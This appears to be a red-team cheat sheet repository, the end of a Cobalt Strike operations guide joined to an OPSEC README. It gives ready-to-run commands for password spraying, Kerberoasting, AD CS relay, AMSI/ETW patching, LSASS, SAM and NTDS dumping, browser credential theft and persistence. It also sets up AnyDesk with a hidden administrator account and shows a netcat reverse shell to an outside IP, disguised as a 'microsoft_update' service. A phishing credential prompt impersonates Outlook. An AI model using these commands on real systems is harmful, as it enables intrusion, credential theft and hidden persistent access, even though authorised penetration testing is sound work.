328 | ``` execute-assembly SharpLAPS.exe /user:DOMAIN\USER /pass:PASSWORD /host:IPADDRESS``` 329 | 330 | 331 | ### Password spraying 332 | [DomainPasswordSpray.ps1](https://github.com/dafthack/DomainPasswordSpray) 333 | ``` 334 | powershell-import --> DomainPasswordSpray.ps1 335 | # Get the full domain user list (Optional) 336 | powershell Get-DomainUserList -Domain lab.com -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt 337 | 338 | # Password spray from a username and password list 339 | powershell Invoke-DomainPasswordSpray -UserList userlist.txt -PasswordList passlist.txt -Domain lab.com -OutFile sprayed-creds.txt 340 | 341 | # Auto spray a specific password on an auto-generated user list (very noisy) 342 | powershell Invoke-DomainPasswordSpray -Password Summer2021 343 | ``` 344 | Rubeus brute-force password spraying a single password or using a password file 345 | ``` 346 | execute-assembbly C:\Rubeus.exe brute /password:Password123! /domain:lab.com /noticket /outfile:passes-sprayed.txt [/passwords:PASSWORDS_FILE>] [/user:USER | /users:USERS_FILE] [/creduser:DOMAIN\\USER & /credpassword:PASSWORD] [/dc:DOMAIN_CONTROLLER] [/verbose] [/nowrap] 347 | ``` 348 | [SharpSpray](https://github.com/jnqpblc/SharpSpray) - .NET port of PowerSpray.ps1 349 | ``` 350 | # By default it will automatically generate a user list from the domain using LDAP 351 | # Sleeps 30 minutes between each password cycle, delays 300 milliseconds between each password guess attempt 352 | execute-assembly C:\SharpSpray.exe --Passwords Summer2021,Fall2021 --Sleep 30 --Delay 300 353 | ``` 354 | 355 | ### Kerberoasting 356 | PowerView kerberoasting (Outdated and still reliant on PowerShell) 357 | ``` 358 | # Get users with SPN set 359 | powershell Get-DomainUesr -SPN 360 | 361 | # Kerberoast all users 362 | powershell Invoke-Kerberoast - OutputFormat hashcat | fl 363 | 364 | # Kerberoast specific user 365 | powershell Invoke-Kerberoast -Identity testaccount -Domain lab.com -OutputFormat hashcat | fl 366 | ``` 367 | 368 | Rubeus kerberoasting 369 | ``` 370 | # Kerberoast all users 371 | execute-assembly C:\Rubeus.exe kerberoast /outfile:KerbHashes.txt /domain:lab.com 372 | 373 | # Kerberoast specific user 374 | execute-assembly C:\Rubeus.exe kerberoast /outfile:KerbHash.txt /user:testaccount /domain:lab.com 375 | ``` 376 | 377 | ### AS-REP Roasting 378 | Target users in AD that do not require pre-authentication
379 | ``` 380 | # AS-REP roast all users with Rubeus 381 | execute-assembly C:\Rubeus.exe asreproast /format:hashcat /outfile:C:\Temp\asrep-hashes.txt 382 | 383 | # AS-REP roast specific user with Rubeus 384 | execute-assembly C:\Rubeus.exe asreproast /user:testuser /format:hashcat /outfile:C:\Temp\asrep-hashes.txt 385 | ``` 386 | 387 | ### Coercion attacks 388 | #### [PetitPotam](https://github.com/topotam/PetitPotam) - NTLM relay to AD CS 389 | > PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions 390 | - Requires AD CS web server enrollment enabled 391 | - Requries Kali running Impacket on target domain 392 | ``` 393 | # Find AD CS web server and verify if web enrollment is enabled by browsing to the URL: `http://ADCS-server.domain.com/certsrv/` 394 | run certutil.exe 395 | 396 | # Start NTLM relay server on Kali 397 | python3 ntlmrelayx.py -t http://ADCS-server.domain.com/certsrv/certfnsh.asp -smb2support --adcs --template DomainController 398 | 399 | # Force coercion via PetitPotam in Cobalt Strike Beacon - Observe "Attack Success!!!" in output if it worked 400 | run PetitPotam.exe

401 | 402 | # NTLM relay output will have base64 ticket of target DC machine account 403 | # Use Rubeus to request TGT of DC machine account to esclate to Domain Admin 404 | execute-assembly C:\Rubeus.exe asktgt /dc: /domain:domain.com /user:$ /ptt /certificate: 405 | 406 | # Verify asktgt command worked by doing an 'ls' command on the DC 407 | ls \\\c$ 408 | ``` 409 | References: 410 | - [https://pentestlab.blog/2021/09/14/petitpotam-ntlm-relay-to-ad-cs/](https://pentestlab.blog/2021/09/14/petitpotam-ntlm-relay-to-ad-cs/) 411 | - [https://hakin9.org/domain-takeover-with-petitpotam-exploit/](https://hakin9.org/domain-takeover-with-petitpotam-exploit/) 412 | ------------------------------------------------------------------------------------------ 413 | ## Defense Evasion 414 | 415 | ### Shellcode injection techniques 416 | Several methods here within Cobalt Strike or using BOFs 417 | ``` 418 | # Spawn a beacon into an existing process 419 | inject HTTPSLISTENER 420 | 421 | # Inject raw shellcode into an existing process 422 | # Create shellcode: Cobbalt Strike --> Attacks --> Packages --> Windows Executable (S) --> Output = Raw --> Creates "beacon.bin" file 423 | shinect C:\beacon.bin 424 | 425 | # Shellcode injection methods using Windows syscalls with [BOFs script](https://github.com/ajpc500/BOFs) 426 | syscalls_inject 427 | syscalls_shinject C:\beacon.bin 428 | static_syscalls_inject 429 | static_syscalls_shinject C:\beacon.bin 430 | syscalls_shspawn C:\beacon.bin 431 | ``` 432 | 433 | ### AMSI patch 434 | [BOF-patchit](https://github.com/ScriptIdiot/BOF-patchit) for current process
435 | `patchit amsi` 436 | 437 | [boku7/InjectAmsiBypass](https://github.com/boku7/injectAmsiBypass) BOF
438 | Patch AMSI in remote process 439 | `inject-amsiBypass ` 440 | 441 | ### ETW patch 442 | [BOF-patchit](https://github.com/ScriptIdiot/BOF-patchit) for current process
443 | `patchit etw` 444 | 445 | [ajpc500/BOFs](https://github.com/ajpc500/BOFs/) ETW patch for current process
446 | `etw stop` / `etw start` 447 | 448 | ### API Unhooking 449 | Cobalt Strike's hail-mary unhooking function. "This is a Beacon Object File to refresh DLLs and remove their hooks. The code is from Cylance's Universal Unhooking research"
450 | `unbook` 451 | 452 | ------------------------------------------------------------------------------------------ 453 | ## Exploitation 454 | 455 | ### DPAPI decryption and extraction on Windows systems 456 | [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI) 457 | ``` 458 | # SharpDPAPI to retrieve domain DPAPI backup key and output to file which is used for subsequent attacks (requires DA privileges) 459 | execute-assembly C:\SharpDPAPI.exe backupkey /file:key.pvk 460 | 461 | # Decrypt any RDG (remote desktop) passwords found using the domain backup key (can also use local Admin account or master key) 462 | execute-assembly C:\SharpDPAPI.exe rdg /pvk:key.pvk /unprotect 463 | 464 | # Decrypt any KeePass passwords found using the domain backup key (can also use local Admin account or master key) 465 | execute-assembly C:\SharpDPAPI.exe keepass /pvk:key.pvk /unprotect 466 | ``` 467 | 468 | SharpChrome to extract and decrypt a user's Chrome sessions/passwords 469 | ``` 470 | # Dump Chrome logins on the local system for the current user 471 | execute-assembly C:\SharpChrome.exe logins /unprotect 472 | 473 | # Dump Chrome cookies on the local system for the current user 474 | execute-assembly C:\SharpChrome.exe cookies 475 | 476 | # Dump Chrome cookies on the local system only for a specific URL - Output in JSON format to import into "Cookie Editor" browser extension 477 | execute-assembly C:\SharpChrome.exe cookies /format:json /browser:chrome /url:".*microsoft.com" 478 | 479 | # Dumping Chrome login passwords on remote machines using the domain backup key (can also use local user password) 480 | execute-assembly C:\SharpChrome.exe logins /pvk:key.pvk /server:SERVER.lab.com 481 | 482 | # Dumping and decryptiong Chrome user cookies and sessions on remote machines using the domain backup key (can also use local user password) 483 | # Cookies can then be imported into Chrome/Firefox using the extension Cookie-Editor 484 | execute-assembly C:\SharpChrome.exe cookies /pvk:key.pvk /server:SERVER.lab.com 485 | ``` 486 | 487 | ### [SharpWeb](https://github.com/djhohnstein/SharpWeb) - Retrieve saved credentials in Chrome, Firefox and Edge 488 | ``` 489 | # Retrive all saved browser credentials 490 | execute-assembly C:\SharpWeb.exe all 491 | ``` 492 | 493 | ### Active Directory Certificate Services (AD CS) Attack 494 | [Certify - GhostPack](https://github.com/GhostPack/Certify)
495 | Enumerate and abuse misconfigurations in AD CS
496 | ``` 497 | # Find vulnerable certificates with Certify.exe 498 | execute-assembly C:\Certify.exe find /vulnerable /domain:lab.com 499 | 500 | # Request a new certificate for a vulnerable template from the above output 501 | execute-assembly C:\Certify.exe request /ca:lab.com\ops-dc01 /template:VulnTemplate /altname:DomainAdminUser1 502 | 503 | # Copy the certificate private key from the above output to a file, then request a TGT using the certificate file with Rubeus 504 | execute-assembly C:\Rubeus.exe asktgt /user:DomainAdminUser1 /certificate:C:\Temp\cert.pfx /domain:lab.com 505 | ``` 506 | 507 | [Certipy - Python](https://github.com/ly4k/Certipy)
508 | Use Python through a SOCKS proxy or a Linux VM on the domain to find and exploit misconfigured AD CS certs
509 | ``` 510 | # First, start a SOCKS proxy in Cobalt Strike (or skip to the next step if you have an on-site Linux VM) 511 | socks socks5 512 | 513 | # Configure proxychains on Kali/Linux VM to proxy traffic through C2 514 | 515 | # Find vulnerable certs with Certipy through proxy 516 | proxychains certipy find -u 'my-user@domain.com' -p 'PASSWORD' -dc-ip 10.100.32.200 -vulnerable -timeout 30 517 | 518 | # Request a certificate for a vulnerable cert template through proxy 519 | proxychains certipy req -u 'my-user@domain.com' -p 'PASSWORD' -dc-ip 10.100.32.200 -ca corp-DC-CA -target ca.domain.com -template VulnTemplate -debug -upn 'DomainAdminAcc@domain.com' 520 | # Authenticate with the output .PFX cert file to reequset a TGT for the DomainAdminAcc user 521 | proxychains certipy auth -pfx DomainAdminAcc.pfx -username DomainAdminAcc -domain 'domain.com' -dc-ip X.X.X.X 522 | --> Command will output NTLM hash of target account and the user's certificate 523 | 524 | # Use the output certificate of the DomainAdminAcc account with Rubeus 525 | execute-assembly C:\Rubeus.exe asktgt /user:DomainAdminAcc /certificate:DomainAdminAcc.pfx /ptt /domain:domain.com /dc:DomainController.domain.com 526 | ls \\DomainController\c$ --> Verify command was successfully by doing an 'ls' cmd on the DC 527 | ``` 528 | 529 | ### [MalSCCM](https://github.com/nettitude/MalSCCM) - Exploiting SCCM servers to deploy malicious applications
530 | - Requires admin privileges on target SCCM server 531 | ``` 532 | # Find the SCCM management servers 533 | execute-assembly C:\MalSCCM.exe locate 534 | 535 | # Check if the current host is an SCCM client 536 | execute-assembly C:\MalSCCM.exe 537 | 538 | # Gather all info from SCCM including users, groups, forest, application, deployments 539 | execute-assembly C:\MalSCCM.exe inspect /all /server: 540 | 541 | # You can use MalSCCM to deploy a malicious application to a target group then force the users to check-in and run your payload 542 | # This is explained in MUCH more details in the walkthrough here: https://labs.nettitude.com/blog/introducing-malsccm/ 543 | ``` 544 | 545 | ------------------------------------------------------------------------------------------ 546 | ## Exfiltration - Password Attacks 547 | 548 | ### Dumping LSASS locally (all commands below require local Admin) 549 | Mimikatz built-in to dump passwords/hashes to console 550 | ``` 551 | # Works against most updated systems with AV/EDR if running as SYSTEM 552 | logonpasswords 553 | ``` 554 | Dumping LSASS with ProcDump.exe (requires touching disk) (NOTE: Might get flagged by AV and raise alerts but can still output LSASS dump file) 555 | ``` 556 | upload --> ProcDump.exe 557 | run ProcDump.exe -accepteula -ma lsass.exe lsass.dmp 558 | ``` 559 | Dumping LSASS with [Out-Minidump.ps1 from PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1) without touching disk 560 | ``` 561 | powershell Get-Process | Out-Minidump -DumpFilePath C:\temp 562 | ``` 563 | Extract LSASS process with [SafetyKatz](https://github.com/GhostPack/SafetyKatz) 564 | ``` 565 | execute-assembly C:\SafetyKatz.exe --> Dumps LSASS process to .dmp file on the local system 566 | ``` 567 | LSASS dump BOFs 568 | ``` 569 | minidumpwritedump --> https://github.com/rookuu/BOFs/tree/main/MiniDumpWriteDump 570 | nanodump --> https://github.com/fortra/nanodump 571 | ppldump --> https://github.com/EspressoCake/PPLDump_BOF 572 | static_syscalls_dump C:\Users\USER\Desktop\output.dmp --> https://github.com/ajpc500/BOFs/blob/main/StaticSyscallsDump/README.md 573 | ``` 574 | Extracting passwords/hashes offline from LSASS dump using Mimikatz (**ON YOUR OWN SYSTEM!**) 575 | ``` 576 | mimikatz.exe log "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords /all" "sekurlsa::wdigest" exit (Run on your local box) 577 | ``` 578 | 579 | ### SAM database dump 580 | 581 | SAM dump built into CS - Injects into LSASS to dump local SAM database hashes to console 582 | ``` 583 | hashdump 584 | ``` 585 | SAM dump using reg.exe 586 | ``` 587 | run reg.exe save HKLM\sam sam.save 588 | run reg.exe save HKLM\security security.save 589 | run reg.exe save HKLM\system system.save 590 | 591 | # Download SAM files then dump hahses offline using Secretsdump.py 592 | download sam.save 593 | download security.save 594 | download system.save 595 | python secretsdump.py -sam sam.save -security security.save -system system.save LOCAL (Run **ON YOUR OWN SYSTEM**) 596 | ``` 597 | 598 | ### [SharpSecDump](https://github.com/G0ldenGunSec/SharpSecDump) SAM and LSA extraction 599 | Remotely dump SAM and LSA secrets (same functionality as Impacket's secretsdump.py) 600 | ``` 601 | # Runs in the context of the current user 602 | # Local Admin privileges is required on the target machine 603 | execute-assembly C:\SharpSecDump.exe -target=192.168.1.15 -u=admin -p=Password123 -d=lab.local 604 | ``` 605 | 606 | ### NTDS.dit dump (all commands below require Domain Admin privileges!) 607 | 608 | [Invoke-DCSync.ps1](https://gist.github.com/monoxgas/9d238accd969550136db) to perform DCSync attacks remotely 609 | ``` 610 | powershell-import --> Invoke-DCSync.ps1 611 | 612 | # Perform DC Sync hash dump for all users in the target domain 613 | powershell Invoke-DCSync -Domain lab.local [-DomainController ops-dc01.lab.local] 614 | 615 | # Perform DC Sync hash dump for all users in the specified group 616 | powershell Invoke-DCSync -Domain lab.local -GroupName "Domain Admins" | ft -wrap -autosize 617 | ``` 618 | [Copy-VSS.ps1 from Nishang toolkit](https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1) to dump NTDS.dit locally on the DC 619 | ``` 620 | powershell-import --> Copy-VSS.ps1 621 | powerpick Copy-VSS -DestinationDir C:\temp 622 | ``` 623 | NTDSutil.exe to dump NTDS.dit locally on a Domain Controller 624 | ``` 625 | run ntdsutil.exe activate instance ntds,ifm,create full C:\ntdsutil,quit,quit | ntdsutil 626 | ``` 627 | 628 | ### Credential Prompt 629 | [CredPrompt](https://github.com/guervild/BOFs/tree/dev/CredPrompt) to ask the current user for their username/password. 630 | ``` 631 | credprompt "Credentials are required to re-authenticate to Outlook:" 632 | ``` 633 | ------------------------------------------------------------------------------------------ 634 | ## Exfiltration - Email 635 | 636 | ### [MailSniper](https://github.com/dafthack/MailSniper) 637 | PowreShell tool to search mailboxes in a Microsoft Exchange environment 638 | ``` 639 | powershell-import -> Select MailSniper.ps1 640 | 641 | # Search all mailboxes in a domain - Looks for "*password*","*creds*","*credentials*" 642 | powershell Invoke-GlobalMailSearch -ImpersonationAccount current-username -ExchHostname ExchangeHost.domain.com -OutputCsv global-email-search.csv 643 | 644 | # Search the current users mailbox 645 | powershell Invoke-SelfSearch -Mailbox current-user@domain.com 646 | 647 | # Get the Global Address List (GAL) 648 | powershell Get-GlobalAddressList -ExchHostname ExchangeHost.domain.com -UserName domain\username -Password P@ssw0rd! -OutFile gal.txt 649 | ``` 650 | ------------------------------------------------------------------------------------------ 651 | ## Persistence 652 | [SharpStay](https://github.com/0xthirteen/SharpStay) - .NET Persistence 653 | ``` 654 | # Scheduled task persistence 655 | execute-assembly C:\Sharpstay.exe action=ScheduledTask taskname=TestTask command="C:\windows\temp\file.exe" runasuser=testuser triggertype=logon author=Microsoft Corp. description="Test Task" logonuser=testuser 656 | 657 | # Service creation persistence 658 | execute-assembly C:\Sharpstay.exe action=CreateService servicename=TestService command="C:\Windows\temp\file.exe" 659 | 660 | # User registry key persistence 661 | execute-assembly C:\Sharpstay.exe action=UserRegistryKey keyname=Debug keypath=HKCU:Software\Microsoft\Windows\CurrentVersion\Run command="C:\Windows\temp\file.exe" 662 | 663 | # Many other methods available on the tool's github documentation 664 | ``` 665 | [SharpPersist](https://github.com/fireeye/SharPersist) 666 | ``` 667 | # List persistence entries 668 | execute-assembly C:\SharPersist.exe -t [reg,schtaskbackdoor,startupfolder,service] -m list 669 | 670 | # Registy persistence 671 | execute-assembly C:\SharPersist.exe -t reg -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -k "hkcurun" -v "Test Payload" -m add -o env 672 | 673 | # Scheduled task backdoor persistence 674 | execute-assembly C:\SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -n "Test Scheduled Task" -m add -o daily 675 | 676 | # Startup folder persistence 677 | execute-assembly C:\SharPersist.exe -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -f "Test File on Startup" -m add 678 | 679 | # Windows service persistence 680 | execute-assembly C:\SharPersist.exe -t service -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -n "Test Service" -m add 681 | ``` 682 | 683 | [StayKit](https://github.com/0xthirteen/StayKit) - Cobalt Strike persistence kit aggressor script 684 | 685 | ------------------------------------------------------------------------------------------ 686 | # Cobalt Strike BOFs 687 | [My BOF Collection GitHub page](https://github.com/wsummerhill/CobaltStrike_BOF_Collections) 688 | 689 | ### [BOF.NET](https://github.com/CCob/BOF.NET/pull/1) 690 | A .NET runtime tool to load assemblies in memory and avoid the typical fork-and-run model from `execute-assembly`. Use BOF.NET to run any .NET tool for better evasion by residing in your current process. Note that this will not bypass AMSI or ETW as those will have to be unhooked separately, if needed. 691 | ``` 692 | bofnet_init 693 | bofnet_load /path/to/assembly.exe 694 | bofnet_listassemblies 695 | bofnet_executeassembly AssemblyName argument1 argument2 696 | ``` 697 | 698 | ------------------------------------------------------------------------------------------ 699 | # References 700 | [Cobalt Strike commands cheat sheet](https://github.com/S1ckB0y1337/Cobalt-Strike-CheatSheet) 701 | 702 | [AD exploitation cheat sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet) 703 | 704 | [Sharphound](https://github.com/BloodHoundAD/SharpHound3) 705 | 706 | [PowerShell remoting cheat sheet](https://blog.netspi.com/powershell-remoting-cheatsheet/) 707 | 708 | [Mimikatz reference cheat sheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md) 709 | 710 | [SpectreOps Cobalt Strike command reference](https://xzfile.aliyuncs.com/upload/affix/20190126174144-9767f9f2-214e-1.pdf) 711 | 712 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Red Team and OPSEC - 2023 Edition 2 | 3 | > The quieter you become, the more you are able to hear 🥷 4 | 5 | ## Basic System Info 6 | - `systeminfo`: Show detailed configuration about the computer and OS. 7 | - `hostname`: Display the host name of the current machine. 8 | 9 | ## Hotfix Information 10 | - `wmic qfe get Caption,Description,HotFixID,InstalledOn`: List patches and hotfixes installed on the system. 11 | 12 | ## User & Group Information 13 | - `net users`: List all user accounts. 14 | - `net localgroups`: List all local groups. 15 | - `net user hacker`: Show information about the user named "hacker". 16 | - `net group /domain`: List all domain groups. 17 | 18 | ## Network Details 19 | - `ipconfig /all`: Show detailed IP configuration. 20 | - `route print`: Display routing table. 21 | - `arp -A`: Show ARP cache. 22 | 23 | ## Privilege Information 24 | - `whoami /priv`: Display user privileges. 25 | 26 | ## Data Search 27 | - `findstr /spin "password" *.*`: Recursively search for the term "password" in files. 28 | 29 | ## Process & Service Details 30 | - `tasklist /SVC`: List running processes with service details. 31 | - `sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul`: Identify unquoted service paths which can be exploited for privilege escalation. 32 | 33 | ## Network Connections 34 | - `netstat -ano`: List network connections, ports, and associated process IDs. 35 | 36 | ## Directory Access 37 | - `dir /a-r-d /s /b`: Search for writeable directories. 38 | 39 | ## Domain & Forest Info (PowerShell) 40 | - `[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()`: Get current domain details. 41 | - `([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()`: List trust relationships of current domain. 42 | - `[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()`: Get current forest details. 43 | - `([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()`: List trust relationships of a specific forest. 44 | 45 | ## Domain Controller and Trusts 46 | - `nltest /dclist:offense.local`: List all Domain Controllers in the specified domain. 47 | - `net group "domain controllers" /domain`: Display domain controllers in the domain. 48 | - `nltest /dsgetdc:offense.local`: Get Domain Controller details for a domain. 49 | - `nltest /domain_trusts`: List all domain trusts. 50 | - `nltest /user:"spotless"`: Fetch details for a specific user. 51 | 52 | ## Authentication & Session Details 53 | - `set l`: Display local environment variables. 54 | - `klist`: Display Kerberos tickets. 55 | - `klist sessions`: Display all logon sessions, including NTLM. 56 | - `klist tgt`: Display cached Kerberos TGT (Ticket Granting Ticket). 57 | 58 | ## Miscellaneous 59 | - `whoami`: Display logged-in user details (useful on older systems). 60 | 61 | ## Host Discovery 62 | Discover alive hosts in a network. 63 | - `$ nmap -sn -T4 -oG Discovery.gnmap 192.168.1.1/24`: Ping scan, no port scan. 64 | - `$ grep “Status: Up” Discovery.gnmap | cut -f 2 -d ‘ ‘ > LiveHosts.txt`: Extract live hosts from the results. 65 | 66 | ## Top Ports Scan 67 | Identify most commonly used ports. 68 | - `$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt`: TCP SYN scan. 69 | - `$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt`: UDP scan. 70 | 71 | ## Full Range Port Scan 72 | Full range port scanning; UDP might be slow. 73 | - `$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt`: Common 3674 TCP ports. 74 | - `$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt`: All TCP ports. 75 | - `$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt`: All UDP ports. 76 | 77 | ## Extract Open Ports 78 | Commands to extract and display open TCP and UDP ports. 79 | - `$ grep “open” FullTCP | cut -f 1 -d ‘ ‘ | sort -nu | cut -f 1 -d ‘/’ | xargs | sed ‘s/ /,/g’ | awk ‘{print “T:”$0}’` 80 | - `$ grep “open” FullUDP | cut -f 1 -d ‘ ‘ | sort -nu | cut -f 1 -d ‘/’ | xargs | sed ‘s/ /,/g’ | awk ‘{print “U:”$0}’` 81 | 82 | ## Service and OS Detection 83 | Identify services running and OS details. 84 | - `$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt`: Service detection. 85 | - `$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt`: OS detection. 86 | - `$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt`: Combined OS and service detection for specific ports. 87 | 88 | ## Evasion Techniques 89 | Methods to avoid firewalls or obfuscate scan origin. 90 | 91 | ### Segmentation 92 | - `$ nmap -f`: Segmented packet scan. 93 | 94 | ### MTU Manipulation 95 | - `$ nmap --mtu 24`: Change MTU size. It should be a multiple of 8. 96 | 97 | ### Decoy Scanning 98 | Make it appear the scan is coming from other hosts. 99 | - `$ nmap -D RND:10 [target]`: Randomized decoy scan. 100 | - `$ nmap -D decoy1,decoy2,decoy3 [target]`: Manually specify decoys. 101 | 102 | ### Zombie Host Scanning 103 | Use idle hosts to mask scan origin. 104 | - `$ nmap -sI [Zombie IP] [Target IP]`: Idle scan using a specific zombie. 105 | 106 | ### Specified Source Port 107 | - `$ nmap --source-port 80 [target]`: Scan with a specified source port (80 in this case). 108 | 109 | 110 | ## AnyDesk OPSEC Usage 111 | This outlines the usage of AnyDesk, a commercial remote access tool utilized by threat actors for browsing victim host file systems, deploying payloads, and data exfiltration. 112 | 113 | **Downloading and Installing AnyDesk:** 114 | 115 | 1. **Download AnyDesk Executable:** 116 | - Download the AnyDesk executable using PowerShell. 117 | - Example PowerShell Script: 118 | ```powershell 119 | Invoke-WebRequest -Uri -OutFile 'C:\ProgramData\AnyDesk.exe' 120 | ``` 121 | 122 | 2. **Silent Installation and Password Configuration:** 123 | - Silently install AnyDesk and set an access password. 124 | - Commands: 125 | ```batch 126 | cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent 127 | cmd.exe /c echo | C:\ProgramData\AnyDesk.exe --set-password 128 | ``` 129 | 130 | **Configuring Additional Administrator Account:** 131 | 132 | 3. **Create an Additional Administrator Account:** 133 | - Add an administrator account with a password. 134 | - Command: 135 | ```batch 136 | net user "" /add 137 | ``` 138 | 139 | 4. **Add Account to Administrators Group:** 140 | - Include the new administrator account in the Administrators group. 141 | - Command: 142 | ```batch 143 | net localgroup Administrators /ADD 144 | ``` 145 | 146 | 5. **Hide Account from Login Screen:** 147 | - Prevent the account from appearing on the login screen. 148 | - Command: 149 | ```batch 150 | reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v /t REG_DWORD /d 0 /f 151 | ``` 152 | 153 | **Gaining Remote Access with AnyDesk:** 154 | 155 | 6. **Execute AnyDesk with Get-ID Parameter:** 156 | - Launch AnyDesk with the `--get-id` parameter to enable remote access. 157 | - Command: 158 | ```batch 159 | cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id 160 | ``` 161 | 162 | # 163 | # Web Path Scanner and Brute Force Tools 164 | 165 | ## Web Path Scanners: 166 | 167 | ### 1. **dirsearch** 168 | - A versatile directory and file brute-forcing tool. 169 | - Usage: `dirsearch [options]` 170 | 171 | ### 2. **DirBuster** 172 | - A GUI-based tool for directory brute-forcing. 173 | - Ideal for finding hidden web paths. 174 | - Download and usage instructions: [DirBuster](https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project) 175 | 176 | ### 3. **Patator (Password Guessing)** 177 | - Patator is used for password guessing attacks across various protocols. 178 | - Install: `git clone https://github.com/lanjelot/patator.git /usr/share/patator` 179 | 180 | ## Brute Force with Patator: 181 | 182 | ```bash 183 | $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst 184 | $ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst 185 | $ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst 186 | $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name' 187 | ``` 188 | 189 | ## DNS Enumeration with Fierce: 190 | 191 | - Fierce is a DNS enumeration tool that checks for zone transfers and DNS host name enumeration. 192 | - Usage: 193 | ```bash 194 | $ ./fierce.pl -dns example.com 195 | $ ./fierce.pl --dns example.com --wordlist myWordList.txt 196 | ``` 197 | 198 | ## Web Service Scanning with Nikto: 199 | 200 | - Nikto is a web server scanner that detects vulnerabilities and misconfigurations. 201 | - Usage: `nikto -C all -h http://IP` 202 | 203 | ## WordPress Scan with WPScan: 204 | 205 | - WPScan is a specialized tool for scanning WordPress installations. 206 | - Usage: 207 | ```bash 208 | git clone https://github.com/wpscanteam/wpscan.git && cd wpscan 209 | ./wpscan --url http://IP/ --enumerate p 210 | ``` 211 | 212 | ## HTTP Fingerprint Identification with Httprint: 213 | 214 | - Httprint identifies HTTP server software and version. 215 | - Usage: 216 | ```bash 217 | wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip 218 | cd httprint_301/linux/ 219 | ./httprint -h http://IP -s signatures.txt 220 | ``` 221 | 222 | ## Web Application Security Scanning with Skipfish: 223 | 224 | - Skipfish is a comprehensive web application security detection tool. 225 | - It generates interactive site maps and security reports. 226 | - Usage: 227 | ```bash 228 | skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP 229 | ``` 230 | 231 | ## Network Scanning and Enumeration: 232 | 233 | ### NC (Netcat) Scan: 234 | ```bash 235 | # Basic port scan on 'target' 236 | nc -v -w 1 target -z 1-1000 237 | 238 | # Port scan range on a set of IP addresses 239 | for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done 240 | ``` 241 | 242 | ### Unicornscan: 243 | ```bash 244 | # Unicornscan for information gathering and security audits 245 | # Scanning for all ports and services (TCP and UDP) 246 | us -H -msf -Iv 192.168.56.101 -p 1-65535 247 | us -H -mU -Iv 192.168.56.101 -p 1-65535 248 | ``` 249 | 250 | ### Xprobe2 for OS Fingerprinting: 251 | ```bash 252 | # Identify the operating system fingerprint on 'IP' 253 | xprobe2 -v -p tcp:80:open IP 254 | ``` 255 | 256 | ## Enumeration and Windows Commands: 257 | 258 | ### Samba Enumeration: 259 | ```bash 260 | # Enumeration of Samba services on 'target' 261 | nmblookup -A target 262 | smbclient //MOUNT/share -I target -N 263 | rpcclient -U "" target 264 | enum4linux target 265 | ``` 266 | 267 | ### SNMP Enumeration: 268 | ```bash 269 | # Enumerating SNMP on 'IP' using different commands 270 | snmpget -v 1 -c public IP 271 | snmpwalk -v 1 -c public IP 272 | snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP 273 | ``` 274 | 275 | ### Windows Commands: 276 | ```bash 277 | # Various Windows command-line operations 278 | net localgroup Users 279 | net localgroup Administrators 280 | search dir/s *.doc 281 | system("start cmd.exe /k $cmd") 282 | sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore 283 | /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779 284 | mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" 285 